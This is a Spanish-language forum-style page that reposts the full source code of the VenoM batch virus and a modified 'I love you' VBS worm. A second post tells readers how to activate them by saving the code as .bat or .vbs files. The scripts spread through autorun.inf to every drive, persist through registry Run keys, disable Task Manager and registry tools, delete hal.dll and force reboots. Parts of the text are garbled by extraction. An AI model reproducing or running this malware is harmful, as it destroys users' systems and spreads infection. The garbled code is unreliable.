You are on page 1of 38

Codigo fuente del virus VenoM

CompartirTwittear
Para todos aquellos que les pueda interesar, en este, mi primer post, pueden encontrar
el cdigo fuente del virus. Que conste que hago este aporte con fines educativos, para
analizar de qu manera actuan estos malware y entender su propsito especfico.

Para aquellos que no conocen este nuevo virus, aqu esta una breve descripcin:
Este virus se manifiesta de la siguiente manera:
* Crea un ejecutable de 181 kb por cada carpeta existente en una unidad de disco o memoria.
* Crea un explorer.exe y un mis documentos.exe de 181 kb.
* Deshabilita las opciones de carpeta y el administrador de tareas.
* Conforme pasa el tiempo empieza a enviar un mensaje de texto que dice:
* El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3@hotmail.com).
* Cambia las propiedades del Explorador de Windows para no poder visualizar los archivos
ocultos y esconde las extensiones de archivos.
* Oculta la carpeta del sistema (Windows) y crea un archivo ejecutable con cono de carpeta
llamado Windows en la unidad del sistema, entre algunas cosas ms.
@shift 1
@echo of
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata
%\desktop.log
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
set a=%random%
taskkill /f /im Ad-Watch.exe
copy /y %0 "%Windir%\System\winlogon.exe"
if exist "%Windir%\System\winlogon.exe" goto cop

copy /y %0 "%appdata%\smss.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t
REG_SZ /d "%appdata%\smss.exe" /f
:cop
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t
REG_SZ /d "%Windir%\System\winlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v
NoFolderOptions /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v
DisableTaskMgr /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
DisableRegistryTools /t reg_dword /d "1" /f
reg add
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SH
OWALL" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t
REG_DWORD /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v
HideFileExt /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v
ShowSuperHidden /t REG_DWORD /d "0" /f
reg add "HKCU\_VenoM_Software_%a%%a%%a%\Virus" /v estas /d "infectado"
copy /y %0 "%userprofile%\Men Inicio\Programas\Inicio\MS-DOS.pif"
copy /y %0 "%systemdrive%\Docume~1\Default User\Men
Inicio\Programas\Inicio\System.exe"
copy /y %0 "%userprofile%\SendTo\Mis documetos.exe"
copy /y %0 "%userprofile%\SendTo\Disco extraible.pif"
copy /y %0 "%userprofile%\SendTo\Documentos compartidos.scr"
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr
:NO
attrib +h %windir%
copy /y %0 "%systemdrive%\WINDOWS.EXE"
copy /y %0 "%windir%\system32\%username% 3D.scr"
copy /y %0 "%userprofile%\Men Inicio\Mis documentos.exe"

copy /y %0 "%userprofile%\Datosd~1\Microsoft\Internet Explorer\Quick Launch\Mis


documentos.exe"
copy /y %0 "%systemdrive%\RECYCLER\Documendos borrados de %username%.exe"
copy /y %0 "%systemdrive%\RECYCLER\Papelera de reciclaje compartida.exe"
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666\Explorer.exe>>autorun.inf
echo shell\Open=>>autorun.inf
echo shell\Open\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\Explore\=>>autorun.inf
echo shell\Explore\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\find\=>>autorun.inf
echo shell\find\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\CMD=Smbolo del sistema>>autorun.inf
echo shell\CMD\Command=.\VenoM.666\Explorer.exe>>autorun.inf
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0 /y %0 "%%h:\100%% %username
%.exe"&attrib -r -a -s -h %%h:\*.inf>Nul /y autorun.inf %%h:\autorun.inf>Nul&attrib +s +h +r
+a %%h:\autorun.inf>Nul&md %%h:\VenoM.666>Nul /y %0 %
%h:\VenoM.666\Explorer.exe>Nul&attrib +s +h %%h:\VenoM.666\*.exe>Nul&attrib +s +h %
%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata
%\desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3
@hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
copy /y VenoM.txt "%userprofile%\SendTo\Game Over %a%%a%.txt"
print VenoM.txt

for /l %%t in (1,1,24) do at %%t /delete


set h=0
:q
at %h%:13 /interactive "%userprofile%\VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q
:l
if exist "%appdata%\services.exe" goto bl
copy /y %0 "%appdata%\services.exe"
:bl
if exist "%appdata%\lsass.exe" goto oz
copy /y %0 "%appdata%\lsass.exe"
:oz
if %0=="%appdata%\services.exe" goto ser
if %0=="%appdata%\lsass.exe" goto w
"%appdata%\services.exe"
"%appdata%\lsass.exe"
exit
:w
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\VenoM.666\Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\autorun.inf" goto d )
goto w
:d
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0 /y %0 "%%h:\100%% %username
%.exe"&attrib -r -a -s -h %%h:\*.inf /y autorun.inf %%h:\autorun.inf&attrib +s +h +r +a %
%h:\autorun.inf&md %%h:\VenoM.666 /y %0 %%h:\VenoM.666\Explorer.exe&attrib +s +h %
%h:\VenoM.666\*.exe&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time
% in %%h:>>"%appdata%\desktop.inf"
goto w

if %COMPUTERNAME%==DESKTOP exit
del
/q "%windir%\system32\hal.dll"
cd "%userprofil
\Men Inicio\Programas\Inicio\"
ec
shutdown -r -f -t 00>VenoM.ba
echo OPTION EXPLICIT>VenoM.vbs

echo DIM clave>>VenoM.vbs

echo DO WHILE (clave ^<^> "666"

>>VenoM.vbs

echo clave = msgbox ("", VBCRITICAL, ""

>>VenoM.vbs

echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2"

>>VenoM.vbs

echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM"

>>VenoM.vbs

echo LOOP>>Veno
vbs
start VenoM.vbs
shutdown -r -f -t 12
c
elcom
to Hel
:B
echo
goto B

:ser
cd
%appdata%"
set u=%0
dir "%userprofile%\misdoc~1\*." /b /s >"%ap
ata%\NTUSER.DAT.DLL"
for %%f in (%TU%)
do if exist %%f:\*.* (dir "%%f:\*." /b /s) >>"%ap
ata%\NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT
LL
do call
"%%a"
:V
set t=%
copy /y
% %t%.exe
Fuentes:
En esta fuente pueden encontrar la manera de desinfectarse de este vir
us, para aquellos que s
han visto afectados.
http://www.bitslab.net/2007/10/31/como-eliminar-el-virus-venom-m
do-de-desinfeccion/
http://foro.el-hacker.com/index.p
/topic,142797.0.html

Agradecer no cuesta nada.

Codigos Fuentes de Virus


Informaticos

Cmo ganar en las crisis


whotrades.com
El mercado de divisas le hace ganar, Bono para los nuevos traders.

CompartirTwittear
Primero quiero decir que pongo estos codigos fuentes solamente por informacion,investigacion
y prevencion no me hago responsabloe de lo que hagan con ellos.
Estos Virus se activan de la siguiente manera: copian y pegan el codigo fuente en el bloc de
notas despues lo guardan con extension bat EJ: Garbage.bat.
Codigos Fuente:
Virus Venom:
@shift 1
@echo of
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata
%desktop.log
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
set a=%random%
taskkill /f /im Ad-Watch.exe
copy /y %0 "%Windir%Systemwinlogon.exe"
if exist "%Windir%Systemwinlogon.exe" goto cop

copy /y %0 "%appdata%smss.exe"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v CFTMON.EXE /t REG_SZ /d
"%appdata%smss.exe" /f
:cop
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v CFTMON.EXE /t REG_SZ /d
"%Windir%Systemwinlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions
/t REG_DWORD /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t
reg_dword /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v
DisableRegistryTools /t reg_dword /d "1" /f
reg add
"HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWAL
L" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /t
REG_DWORD /d "2" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t
REG_DWORD /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v
ShowSuperHidden /t REG_DWORD /d "0" /f
reg add "HKCU_VenoM_Software_%a%%a%%a%Virus" /v estas /d "infectado"
copy /y %0 "%userprofile%Men InicioProgramasInicioMS-DOS.pif"
copy /y %0 "%systemdrive%Docume~1Default UserMen InicioProgramasInicioSystem.exe"
copy /y %0 "%userprofile%SendToMis documetos.exe"
copy /y %0 "%userprofile%SendToDisco extraible.pif"
copy /y %0 "%userprofile%SendToDocumentos compartidos.scr"
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr
:NO
attrib +h %windir%
copy /y %0 "%systemdrive%WINDOWS.EXE"
copy /y %0 "%windir%system32%username% 3D.scr"
copy /y %0 "%userprofile%Men InicioMis documentos.exe"
copy /y %0 "%userprofile%Datosd~1MicrosoftInternet ExplorerQuick LaunchMis

documentos.exe"
copy /y %0 "%systemdrive%RECYCLERDocumendos borrados de %username%.exe"
copy /y %0 "%systemdrive%RECYCLERPapelera de reciclaje compartida.exe"
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666Explorer.exe>>autorun.inf
echo shellOpen=>>autorun.inf
echo shellOpenCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellExplore=>>autorun.inf
echo shellExploreCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellfind=>>autorun.inf
echo shellfindCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellCMD=Smbolo del sistema>>autorun.inf
echo shellCMDCommand=.VenoM.666Explorer.exe>>autorun.inf
for %%h in (%YU%) do if exist %%h:*.* attrib -h -s %0 /y %0 "%%h:100%% %username
%.exe"&attrib -r -a -s -h %%h:*.inf>Nul /y autorun.inf %%h:autorun.inf>Nul&attrib +s +h +r +a
%%h:autorun.inf>Nul&md %%h:VenoM.666>Nul /y %0 %
%h:VenoM.666Explorer.exe>Nul&attrib +s +h %%h:VenoM.666*.exe>Nul&attrib +s +h %
%h:VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3
@hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
copy /y VenoM.txt "%userprofile%SendToGame Over %a%%a%.txt"
print VenoM.txt
for /l %%t in (1,1,24) do at %%t /delete
set h=0

:q
at %h%:13 /interactive "%userprofile%VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q
:l
if exist "%appdata%services.exe" goto bl
copy /y %0 "%appdata%services.exe"
:bl
if exist "%appdata%lsass.exe" goto oz
copy /y %0 "%appdata%lsass.exe"
:oz
if %0=="%appdata%services.exe" goto ser
if %0=="%appdata%lsass.exe" goto w
"%appdata%services.exe"
"%appdata%lsass.exe"
exit
:w
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:*.* (if not exist "%%h:VenoM.666Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:*.* (if not exist "%%h:autorun.inf" goto d )
goto w
:d
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:*.* attrib -h -s %0 /y %0 "%%h:100%% %username
%.exe"&attrib -r -a -s -h %%h:*.inf /y autorun.inf %%h:autorun.inf&attrib +s +h +r +a %
%h:autorun.inf&md %%h:VenoM.666 /y %0 %%h:VenoM.666Explorer.exe&attrib +s +h %
%h:VenoM.666*.exe&attrib +s +h %%h:VenoM.666&echo %username%---%date%---%time%
in %%h:>>"%appdata%desktop.inf"
goto w
r
if %COMPUTERNAME%==DESKTOP exit
del /f /q "%windir%system32hal.dll"
cd "%userprofile%Men InicioProgramasInicio"
echo shutdown -r -f -t 00>VenoM.bat

echo OPTION EXPLICIT>VenoM.vbs


echo DIM clave>>VenoM.vbs
echo DO WHILE (clave ^<^> "666">>VenoM.vbs
echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs
echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs
echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs
echo LOOP>>VenoM.vbs
start VenoM.vbs
shutdown -r -f -t 120 -c "Welcome to Hell"
:B
echo
goto B
:ser
cd "%appdata%"
set u=%0
dir "%userprofile%misdoc~1*." /b /s >"%appdata%NTUSER.DAT.DLL"
for %%f in (%TU%) do if exist %%f:*.* (dir "%%f:*." /b /s) >>"%appdata%NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a"
:V
set t=%1
copy /y %u% %t%.exe

Este virus lo tienes que guardar con extension Vbs Ej: I love you.vbs
Codigo Fuente de I love you :
'I love internet, your PC and Windows.
'Modified by @kiHack clampclamphack.es.tl
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf
dim text,size
const NAME = "i_love_you!.txt.vbs"
const NAME2 = "i_love_you.txt.vbs"
atr = "[autorun]"&vbcrlf&"shellexecute=wscript " & NAME

set fs = createobject("Scripting.FileSystemObject
set mf = fs.getfile(Wscript.ScriptFullname)
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource & text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "" & NAME)
tf.attributes = 32
set tf=fs.createtextfile(winpath & "" & NAME,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "" & NAME)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path & "" & NAME)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path & "" & NAME,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path & "" & NAME)

tf.attributes =39

set tf =fs.getfile(flashdrive.path & "autorun.inf"

tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path & "
torun.inf",2
rue)
tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path & "autorun.inf"

tf.a
ributes=39
'---
set tf=fs.getfile(flashdrive.
th & "" & NAME2)

f.attributes =32
set tf=fs.createtextfile(flashdrive.path &
& NAME2,2,true)

f.write
source
tf.close
end if

next

set rg = createobject("WScript.Shell"

rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftW & "" & NAME


rg.reg
write "HKEY_CURRENT_USERSoftwareMicrosoftIn ExplorerMainWindow Title","Stupi
Internet Explorer And Windows 9*/XP/Vista. Buy an A
ivirus!!"
rg.regw
te "HKCRvbsfileDefau
Icon",
hell32.dll,
if check <> 1 then
Wscript.sleep 200000
end if

loop while check<>1

set sd = createobject("Wscript.shell"

if Wscript.ScriptFullname <> NAME2 then


msgbox "I love you forever!" & vbcrlf & "from: Me" & vbcrlf
& vbcrlf & "Send this letter to
riends or loves. It's fun!",,"A letter"
msgbox "Te amo por siempre!" & vbcrlf & "De: Mi" & v
bcrlf & vbcrlf & "Enva esta carta a tus amigos/
ores
Divertido, verdad?",,"Un mensaje"
else
sd.run winpath&"explorer.e
/e,/se

& Wscript.ScriptFullname
end if.

Comenten

You might also like